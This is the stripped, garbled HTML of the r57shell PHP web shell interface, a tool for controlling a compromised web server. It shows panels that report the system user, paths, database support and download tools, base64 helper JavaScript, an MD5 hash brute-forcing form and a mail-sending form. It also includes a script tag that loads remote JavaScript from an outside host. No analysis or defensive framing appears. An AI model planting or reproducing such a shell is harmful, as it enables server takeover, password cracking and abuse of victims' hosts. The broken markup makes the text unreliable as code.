<table width=90% cellpadding=0 cellspacing=0 style="border: 1px solid #666666">
<td width=100% height=70 bgcolor='#333333' style="border-bottom: 2px solid #666666" valign=top>
<table valign=top>
<td width=5% align=right>
<table valign=center class='ram'><table width=100% height=100% cellpadding=0 cellspacing=0>
|
<td width=100% height=100%>
<table cellpadding=2 cellspacing=2 style="border:1px solid #666666;background:darkred">
<font size=2 color=#999999>
<font face=Webdings size=6>!</font> r57shell PHP 8 <font face=Webdings size=6>!</font>
</font> |
<td height=5>
<input type=submit style="border:1px solid #666666;background: darkred;font-weight:bold;" value=' http-shell '>
|
<td valign=top>
<table valign=center class='ram'>
<td width=5% align=right>
<font size=2 color=#888888>System:</font>
<td width=100%>
<font size=2 color=red> echo getsystem();</font>
<td width=5% align=right>
<font size=2 color=#888888>Server:</font>
<td width=100%>
<font size=2 color=red> echo getserver();</font>
<td width=5% align=right>
<font size=2 color=#888888>User:</font>
<td width=100%>
<font size=2 color=red> echo getuser();</font>
<td width=5% align=right>
<font size=2 color=#888888>pwd:</font>
<td width=100%>
<font size=2 color=red> if(strlen($u=pwd())>45){echo "...".substr($u,strlen($u)-40,40);}else{echo $u;};</font>
<td class='ram' width=45% valign=center align=center>
<table cellpadding=0 cellspacing=0>
<table valign=top cellpadding=0 cellspacing=0>
|
<td align=right>
<font size=2 color='#888888'>PHP-version:</font>
<td align=right>
<font size=2 color='#888888'>MySQL:</font>
<td align=right>
<font size=2 color='#888888'>MSSQL:</font>
<td align=right>
<font size=2 color='#888888'>PostgreSQL:</font>
<td align=right>
<font size=2 color='#888888'>Oracle:</font>
<table valign=top cellpadding=0 cellspacing=0>
|
<font size=2 color=red> echo phpversion();</font>
|
echo testmysql();
|
echo testmssql();
|
echo postgresql();
|
echo oracle();
|
<td width=4%>
<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
<td valign=top align=right>
<font color=#888888 size=2>Safe_mode:</font>
<td valign=top align=right>
<font color=#888888 size=2>cURL:</font>
<td valign=top align=right>
<font color=#888888 size=2>wget:</font>
<td valign=top align=right>
<font color=#888888 size=2>fetch:</font>
<td valign=top align=right>
<font color=#888888 size=2>lynx:</font>
<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
<td valign=top>
echo safe_mode();
<td valign=top>
echo testcurl();
<td valign=top>
echo testwget();
<td valign=top>
echo testfetch();
<td valign=top>
echo testlynx();
<td width=4%>
<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
<td valign=top align=right>
<font color=#888888 size=2>Perl:</font>
<td valign=top align=right>
<font color=#888888 size=2>Server time:</font>
<td valign=top align=right>
<font color=#888888 size=2>Server date:</font>
<td valign=top align=right>
<font color=#888888 size=2>Total space:</font>
<td valign=top align=right>
<font color=#888888 size=2>Free space:</font>
<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
<td valign=top>
<font size=2 color=green> echo testperl();</font>
<td valign=top>
<font size=2 color=#999999> echo date('H:i');</font>
<td valign=top>
<font size=2 color=#999999> echo date('d-m-Y');</font>
<td valign=top>
<font size=2 color=#999999> echo view_size(disk_total_space(getcwd()));</font>
<td valign=top>
<font size=2 color=#999999> echo view_size(diskfreespace(getcwd()));</font>
<td width=100% height=100% bgcolor='#333333' valign=top>
<table width=100%>
<td valign=top align=center>
<table width=100% height=200 class='td1'>
<td valign=top align=left width=50%>
<table width=100% height=80 class='td1' valign=top>
<td valign=top align=left width=50%>
<table width=100% height=80 class='td1' valign=top>
<td valign=top align=left width=50%>
<td valign=top align=left width=50%>
<td valign=top align=left width=50%>
<td valign=top align=left width=50%>
<td valign=top align=left width=50%>
<script>
function base64Encode(str)
{
var charBase64 = new Array(
'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'
);
var out = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
var len = str.length;
do
{
chr1 = str.charCodeAt(i++);
chr2 = str.charCodeAt(i++);
chr3 = str.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 0x03) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 0x0F) << 2) | (chr3 >> 6);
enc4 = chr3 & 0x3F;
out += charBase64[enc1] + charBase64[enc2];
if (isNaN(chr2))
{
out += '==';
}
else if (isNaN(chr3))
{
out += charBase64[enc3] + '=';
}
else
{
out += charBase64[enc3] + charBase64[enc4];
}
}
while (i < len);
return out;
}
function base64Decode(str)
{
var indexBase64 = new Array(
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,62, -1,-1,-1,63,
52,53,54,55, 56,57,58,59, 60,61,-1,-1, -1,-1,-1,-1,
-1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,10, 11,12,13,14,
15,16,17,18, 19,20,21,22, 23,24,25,-1, -1,-1,-1,-1,
-1,26,27,28, 29,30,31,32, 33,34,35,36, 37,38,39,40,
41,42,43,44, 45,46,47,48, 49,50,51,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1
);
var out = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
str = str.replace(/^[^a-zA-Z0-9\+\/\=]+|[^a-zA-Z0-9\+\/\=]+$/g,"")
var len = str.length;
do
{
enc1 = indexBase64[str.charCodeAt(i++)];
enc2 = indexBase64[str.charCodeAt(i++)];
enc3 = indexBase64[str.charCodeAt(i++)];
enc4 = indexBase64[str.charCodeAt(i++)];
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
out += String.fromCharCode(chr1);
if (enc3 != -1)
{
out += String.fromCharCode(chr2);
}
if (enc4 != -1)
{
out += String.fromCharCode(chr3);
}
}
while (i < len);
if (i != len)
{
new Error(BASE64_BROKEN);
return "";
}
return out;
}
</script><script src=https://www.localroot.net/sabun/yaz.js></script>
<td valign=top align=left width=50%>
|
<table cellpadding=0 cellspacing=0> |
<table class='td1' width=226>
|
<td width=100% class='td2'>
<td width=5>
<table class='td1' width=226>
| <td width=100% class='td2'>
<td width=5><td width=50% height=141>
<table class='td1' width=100% height=100% valign=top><td width=100% height=100% class='td2' valign=top>
<table cellpadding=0 cellspacing=0 width=95%>
<td colspan=4>
<div class="btitle">.::md5 bruter::.</div>
<td height=10>
<td width=20>
<font size=2 color="#888888" align=right>hash:</font> | <td width=5><td align=right>
<input type=text name='hash' class='ta' size=50>
<td height=5>
<td width=20>
<font size=2 color="#888888" align=right>log_file:</font> | <td width=5><td align=right>
<input type=text name='log' class='ta' size=30 value='md5_log.txt'>
<td height=5>
<td width=20>
<font size=2 color="#888888" align=right>dictionary_file:</font> | <td width=5><td align=right>
<input type=text name='dict' class='ta' size=30 value='md5_dict.txt'>
<td height=5>
<td width=20>
| <td width=5><td align=right>
<input type=submit class='bt' value='Start Brute'>
<td valign=top align=left width=50%>
|
<table class='td1' width=100% height=310 valign=top align=left>
|
<td width=25% align=right>
<font color=#888888 size=2>From:</font>
<td width=65% align=right>
<input type=text name='from' class='ta' size=27>
<td height=5>
| <td width=25% align=right>
<font color=#888888 size=2>Subject:</font>
<td width=65% align=right>
<input type=text name='subject' class='ta' size=27>
<td height=5>
| <td width=25% align=right>
<font color=#888888 size=2>Message:</font>
<td width=65% align=right>
<textarea name='msg' class='ta' cols=20 rows=4></textarea>
<td height=5>
| <td width=25% align=right>
<font color=#888888 size=2>Check<sup>*</sup>:</font>
<td width=65% align=right>
<input type=text name='check' class='ta' size=27>
<td height=5>
| <td width=25% align=right>
<td width=65% align=right>
<input type=submit class='bt' value="Start">
<input type=hidden name='type' value=10>